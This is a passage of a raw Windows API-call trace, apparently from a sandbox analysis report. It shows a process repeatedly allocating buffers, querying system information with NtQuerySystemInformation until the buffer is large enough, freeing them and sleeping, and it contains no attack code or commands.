ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.403] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0287.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0287.412] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0287.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0287.412] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0287.413] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0287.413] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0287.414] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.414] Sleep (dwMilliseconds=0x110) [0287.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0287.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0287.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0287.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0287.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0287.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0287.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.439] Sleep (dwMilliseconds=0x110) [0287.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0287.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0287.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0287.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0287.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0287.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0287.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0287.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0287.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.458] Sleep (dwMilliseconds=0x110) [0287.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0287.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0287.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0287.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0287.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0287.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0287.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0287.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0287.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.527] Sleep (dwMilliseconds=0x110) [0287.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0287.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0287.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0287.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0287.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0287.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0287.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0287.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0287.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.581] Sleep (dwMilliseconds=0x110) [0287.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0287.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0287.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0287.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0287.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0287.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0287.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0287.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0287.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.629] Sleep (dwMilliseconds=0x110) [0287.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0287.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0287.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0287.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0287.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0287.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0287.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0287.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0287.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.692] Sleep (dwMilliseconds=0x110) [0287.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0287.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0287.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0287.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0287.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0287.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0287.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0287.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0287.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.740] Sleep (dwMilliseconds=0x110) [0287.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0287.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0287.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0287.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0287.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0287.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0287.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0287.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0287.850] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.850] Sleep (dwMilliseconds=0x110) [0287.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0287.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0287.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0287.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0287.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0287.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0287.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0287.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0287.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.899] Sleep (dwMilliseconds=0x110) [0287.916] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0287.916] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0287.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0287.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0287.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0287.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0287.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0287.947] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0287.948] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.949] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.949] Sleep (dwMilliseconds=0x110) [0288.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0288.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0288.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0288.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0288.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0288.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0288.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0288.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0288.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.004] Sleep (dwMilliseconds=0x110) [0288.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0288.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0288.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0288.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0288.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0288.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0288.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0288.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0288.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.067] Sleep (dwMilliseconds=0x110) [0288.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0288.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0288.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0288.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0288.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0288.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0288.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0288.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0288.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.128] Sleep (dwMilliseconds=0x110) [0288.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 